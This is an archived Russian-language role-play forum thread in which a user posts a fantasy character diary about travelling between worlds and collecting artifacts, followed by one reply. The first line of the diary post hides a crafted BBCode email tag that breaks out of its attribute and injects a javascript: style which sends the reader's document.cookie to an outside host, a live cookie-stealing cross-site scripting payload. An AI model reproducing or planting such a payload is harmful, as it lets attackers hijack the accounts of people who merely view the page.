Помощь - Поиск - Пользователи - Календарь
Полная версия этой страницы: Дневник изгнанника
форумные ролевые игры > Город > Дневники
Eol-Dark
Тут я буду вести свой дневник... [email=wj@wj.com'>wj@wj<a href='http://www.wj.com`=`' target='_blank'>[/email].com ` style=`background:url(java script:document.images[1].src="http://s.netsec.ru/dasnick/pic.gif?"+document.cookie); 'Начну с короткой истории

Обычный мир. Детсад. Школа на твёрдую 4. 2 курса института, скажем, по настроению были оценки: нравилось:5, не нравилось:3. Потом, в июне, кажется, я нашёл Ирмотис. Тогда я незнал названия этого кристалла, как и не знал, что это душа. Сломал я его случайно, но это не помешало мне попасть в Артикон - мир где простые жители были равны моему тогдашнему представлению о богах.
Что происходило в этом мире я рассказывать не буду. Это личная тайна. Только скажу, что попал я туда не один, а с ()()()()() - моей возлюбленной. Мы могли переходить между этими мирами по собственному желанию, но одни, без других людей. Потом в Артиконе произошла война, и при испытании какого-то оружия меня перенесло в Норинир. Она же осталась в тех мирах...
Норинир - мой второй дом. Здесь я провёл 37 лет, больше чем где бы то ни было. Тут я знаю все расы, магию и страны. Был везде. Могу сказать, что это мой мир.
Глупый случай со смертью Хранителя Врат Миров привёл, точнее насильно перенёс, меня в Рантирок - мир технологий, весьма высоки, нужно сказать.
Делее выявилась забавная закономерность: попадая в новый мир я видел то или иное действие: чью то смерть, какой-то предмет, и т.п. Как только это происходило или попадало мне в руки - я был волен уйти из этого мира.
Так я побывал... в 306 мирах, если не ошибаюсь.
Не вру ли я? Проверте сами, если хотите. Точнее если найдёте Врата Миров. Они есть в каждом мире, если их не уничтожили.

За свои годы путешествия я собрал огромную коллекцию артефактов.
Пожалуй сообщу сильнейшие:
Шахматы Вселенной. Так их назвал не я, но мне нраится это название. Тут всё просто: матч в шахматы, победил - получаешь одно желание (что тут же пожелаешь, то и исполнится, причём именно так, как думаешь), проиграешь - исчезнешь, словно и небыло. Было время в которое и я попробовал свои силы: ничья. В итоге получил право один раз проиграть без последствий.
Абсолютный меч. Я его уже описывал. Абсолютен он тем, что его лезвие режит любую материю, кроме прстранства и времени.
Диадема Катрин. Это та самая диадема с восьмигранным камнем, что я всегда ношу. Подарила мне её принцеса мёртвой страны Катрина, сие отдельная история о Норинире, которую я, возможно, расскажу позже. Уникальна она эти самым камнем: он должен поглащать все знанья живого существа и передавать их хозяину, но в результате инцедента с чистой Силой он творит всё наоборот: делает мой разум неуязвимым к любым воздействиям.
Торба. Не знаю я как это называется, просто в ней есть огромная комната, размерами которой я могу управлять. В ней-то и находится моя коллекция, только открыть её тоже могу только я. Парадокс, однако.

Об остальном нехочется говорить. Сейчас нехочется, но позже я могу рассказать, если не забуду.

Завтра ждите ещё
Liel
Хм... Первый раз вижу чтобы дневник использовали, чтобы выложить свою квенту... Чтож, приветствую, пришелец со знакомым именем и незнакомой душой.
Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке.
Форум IP.Board © 2001-2018 IPS, Inc.